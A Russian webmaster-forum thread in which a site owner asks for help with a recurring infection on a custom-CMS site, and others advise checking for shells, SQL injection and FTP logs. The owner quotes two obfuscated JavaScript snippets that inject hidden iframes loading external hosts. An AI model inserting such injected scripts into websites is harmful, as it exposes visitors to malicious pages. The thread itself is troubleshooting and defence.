- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Каждый месяц на сайте появляется вирус такого типа
<script language=JavaScript>jhtm='%3Ciframe%20src%3D%22http%
3A//123statistik.ru/stat/go2.php%3Fsite%3D5%22%20width%3D1%2
0height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C/ifr
ame%3E';crypo=unescape(jhtm);document.write(crypo);</script>
или
<script language=JavaScript>jhtm='%3Ciframe%20src%3D%22http%
3A//zxcv7.in/stat/%3F3%22%20width%3D2%20height%3D2%20style%3
D%22visibility%3A%20hidden%22%3E%3C/iframe%3E';crypo=unescap
e(jhtm);document.write(crypo);</script>
:no:
Это случилось уже 5 раз за год
1 ) Менял Фтп пароли каждый раз как удалял
2 ) Проверял антивирусом постоянно компьютер на котором Ftp zilla
3 ) Последний раз вообще удалил , поменял пароль и вообще не пользовался ФТП ( Т.е через комп он значит точно не проникает )
4 ) Хостинг Sweb - вроде тоже не левый.
5 ) Единственное - это самописный CMS .
Подскажите где искать ошибку , и как предотвратить его ?
Слабо просканировать сайт на наличие шеллов?
Ну и если у вас самопис, то придётся очень туго. Дырка есть, а искать её кто-то будет только за хорошие $.
Ссылку на сайт мне в л.с скиньте
Ну и если у вас самопис, то придётся очень туго. Дырка есть, а искать её кто-то будет только за хорошие $.
В рот компот , а логи сервера на кой придумали ?
ext3 добавил 31.01.2011 в 20:26
ilux,
епипетская сила , либо шелл , либо sql
Хотя с меньшей долей вероятности , ломают ваш хостинг. Профи . тогда полный болт на вычислить , вам , в данном контексте.
Для начала запросите у хостера логи доступа к ftp за то время, когда появился вирус.
Это как?
Okay спасибо
Кинул
Если есть проблемы попробуем решить, стучите
Запросил логи и получил
xfirelog не показал никаких изменений кроме как моих
А syslog показал два захода в день перед заражением с немоего ip
Что следует из этого ?
Запросил логи и получил
xfirelog не показал никаких изменений кроме как моих
А syslog показал два захода в день перед заражением с немоего ip
Что следует из этого ?
Зашли два раза и что сделали?
Вот что написано
3.gz:Jan 29 14:50:19 pretoria ftp-proxy[27481]: USER-INF 'USER foodmag' from 46.73.204.226
/var/log/syslog.3.gz:Jan 29 14:50:19 pretoria ftp-proxy[27481]: USER-INF reading data for 'foodmag' from cfg-file
/var/log/syslog.3.gz:Jan 29 14:50:23 pretoria ftp-proxy[27593]: USER-INF 'USER foodmag' from 46.73.204.226
/var/log/syslog.3.gz:Jan 29 14:50:23 pretoria ftp-proxy[27593]: USER-INF reading data for 'foodmag' from cfg-file
Сегодня опять появился этот скрипт ! Да чтож такое..
Скрипт в каком файле прописывается?
Что в access логе FTP?